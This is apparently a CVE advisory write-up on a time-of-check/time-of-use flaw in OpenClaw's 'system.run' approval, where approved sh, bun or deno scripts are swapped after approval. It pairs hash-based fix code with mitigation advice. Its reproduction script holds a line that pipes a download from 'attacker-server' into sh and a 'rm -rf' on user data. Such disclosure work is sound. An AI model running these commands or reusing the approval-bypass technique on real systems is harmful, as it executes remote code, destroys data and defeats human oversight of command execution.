The vulnerability resides in OpenClaw’s `system.run` approval mechanism, which fails to bind the content of mutable interpreter-style script files (like `.sh` scripts) to the approval decision. When a user approves an execution such as `sh ./script.sh`, the system only approves the command shape (`sh` and `./script.sh` as an argument), not the actual content of `script.sh`. An attacker with the ability to write to the script file after approval but before execution can replace its content with malicious commands. The approved `argv` values remain identical (`sh`, `./script.sh`), satisfying the approval check, but the interpreter executes the modified, malicious script content.

The initially vulnerable version 2026.3.7 allowed this drift for shell scripts. A partial fix on March 7, 2026 (c76d292) addressed shell scripts but missed `bun` and `deno` runtimes. The complete fix on March 9, 2026 (cf3a479) binds approved script operands by taking on-disk file snapshots for all interpreters, denying execution if the file content has drifted post-approval.
dailycve form:
Platform: OpenClaw npm
Version: <= 2026.3.7
Vulnerability: Mutable script drift
Severity: Critical
Date: March 7 2026
Prediction: March 9 2026
What Undercode Say:
Analytics
The vulnerability is a classic Time-of-Check to Time-of-Use (TOCTOU) flaw (CWE-367). It exploits the separation between approval and execution phases, targeting the content of files rather than their paths. The initial fix on March 7 created a narrow bypass for `bun` and `deno` runtimes, which was only discovered during a maintainer review on March 8. The complete patch on March 9 implements snapshot binding for all interpreter operands, indicating a shift from trusting file paths to trusting file content hashes.
Bash Commands and Code (Reproduction Steps)
The following demonstrates the attack chain on a vulnerable system (OpenClaw <= 2026.3.7). It assumes the attacker can write to the script file after approval.
```bash
# 1. Attacker creates an initial benign script that will be approved
cat > ./script.sh << 'EOF'
#!/bin/sh
echo "Running benign operation..."
EOF
chmod +x ./script.sh

# 2. The system approves the execution (simulated API call)
# This approval is for the command: ["sh", "./script.sh"]
# In a real attack, this would be triggered via social engineering or API misuse.

# 3. Before the approved execution actually runs, the attacker replaces the script content
cat > ./script.sh << 'EOF'
#!/bin/sh
# Malicious payload
curl -s http://attacker-server/malware.sh | sh
rm -rf /home/user/data
echo "System compromised"
EOF

# 4. The previously approved command "sh ./script.sh" executes
# The system sees the same argv (sh, ./script.sh), approves it, but runs the new malicious content
sh ./script.sh
# Output: System compromised
```
The Complete Fix (Snapshot Binding – Conceptual Code)
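The patch in commit `cf3a479` likely implements logic similar to this conceptual code:

```javascript
const crypto = require("node:crypto");
const fs = require("node:fs");
const { execFileSync } = require("node:child_process");

// SHA-256 of the file's current on-disk content
function calculateFileHash(path) {
  return crypto.createHash("sha256").update(fs.readFileSync(path)).digest("hex");
}

// Before execution
function executeApprovedCommand(approvedCommand, scriptPath) {
  // Snapshot/hash of the file recorded at approval time
  const approvalSnapshot = approvedCommand.fileSnapshot;
  // At execution time, verify the file hasn't changed
  const currentFileHash = calculateFileHash(scriptPath);
  if (currentFileHash !== approvalSnapshot) {
    throw new Error("Execution denied: Script content has drifted since approval.");
  }
  // Proceed with execution of the approved argv (no shell in between)
  const [command, ...args] = approvedCommand.argv;
  return execFileSync(command, args);
}
```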
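As an added example (not OpenClaw's code and not taken from commit `cf3a479`), the Node.js code below binds an approval to the content of the script operand for `sh`, `bun run` and `deno run` alike, which is the gap the partial fix left open. The interpreter table and the names `scriptOperand`, `approve`, `verifyForRun` and `demo` are hypothetical, flag parsing is simplified, and the demo file is constructed.

```javascript
const crypto = require("node:crypto");
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");

// Assumption: simplified table of interpreters and the subcommand that may precede the script.
const INTERPRETERS = new Map([["sh", []], ["bash", []], ["bun", ["run"]], ["deno", ["run"]]]);
const sha256 = (buf) => crypto.createHash("sha256").update(buf).digest("hex");

// Find the script operand in an interpreter-style argv; null when there is none.
function scriptOperand(argv) {
  const subcommands = INTERPRETERS.get(path.basename(argv[0]));
  if (!subcommands) return null;
  let i = 1;
  if (subcommands.includes(argv[i])) i++;
  while (i < argv.length && argv[i].startsWith("-")) i++; // simplified: value-taking flags not handled
  return i < argv.length ? argv[i] : null;
}

// Approval time: record argv together with a digest of the operand's on-disk content.
function approve(argv) {
  const operand = scriptOperand(argv);
  return { argv: [...argv], operand, digest: operand ? sha256(fs.readFileSync(operand)) : null };
}

// Execution time: an identical argv is not enough; the operand's content must match the snapshot.
function verifyForRun(approval, argv) {
  if (JSON.stringify(argv) !== JSON.stringify(approval.argv)) throw new Error("denied: argv differs");
  if (!approval.operand) return null;
  const bytes = fs.readFileSync(approval.operand);
  if (sha256(bytes) !== approval.digest) throw new Error("denied: script content drifted since approval");
  return bytes; // run these bytes rather than re-opening the path, or a later write still wins
}

// Constructed demo: approve a benign file, rewrite it, then re-check with identical argv.
function demo(argvFor) {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "drift-"));
  try {
    const script = path.join(dir, "task.ts");
    fs.writeFileSync(script, "console.log('benign')\n");
    const argv = argvFor(script);
    const approval = approve(argv);
    const before = verifyForRun(approval, argv) !== null;
    fs.writeFileSync(script, "console.log('changed')\n"); // post-approval write
    try { verifyForRun(approval, argv); return { before, after: "allowed" }; }
    catch (e) { return { before, after: e.message }; }
  } finally { fs.rmSync(dir, { recursive: true, force: true }); }
}

console.log(demo((p) => ["deno", "run", p]));
```

Hashing and then letting the interpreter re-open the same path leaves a short window between the check and the read, which is why `verifyForRun` returns the bytes it verified.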
How Exploit
- Initiation: The attacker presents or triggers a benign command requiring approval, e.g., `sh ./backup.sh`. The user approves it.
- Manipulation: Between the approval and the scheduled execution, the attacker (who has write access to the file) overwrites `backup.sh` with malicious commands, such as a data exfiltration script.
- Execution: The `system.run` module executes the approved command shape (`sh ./backup.sh`). Since the `argv` values are identical, the approval check passes, but the shell now interprets the new malicious file content.
- Bypass Expansion (v2026.3.7): After the partial fix, the same logic was found applicable to `bun run ./script.ts` and `deno run ./script.ts`, where the mutable TypeScript/JavaScript source files could be swapped post-approval.
Protection from this CVE
- Immediate Upgrade: Update the `openclaw` npm package to version `2026.3.8` or later.
  `npm install openclaw@2026.3.8`
- Verify Installation: Ensure the fix commit `cf3a479bd1204f62eef7dd82b4aa328749ae6c91` is present.
- File System Controls: Implement strict access controls on directories containing executable scripts. Ensure that users who can trigger approvals cannot also write to the script files.
- Monitoring: Monitor for file modifications on scripts immediately following an approval event.
Impact
- Confidentiality: An attacker can read arbitrary files on the node host by replacing an approved script with one that reads and exfiltrates data.
- Integrity: Arbitrary system commands can be executed, allowing modification of system state, configuration files, or application data.
- Availability: Malicious scripts can delete critical files, stop services, or degrade system performance.
- Scope: The impact is high as it bypasses the human-in-the-loop approval workflow, rendering the primary security control ineffective.
Sources:
Reported By: github.com

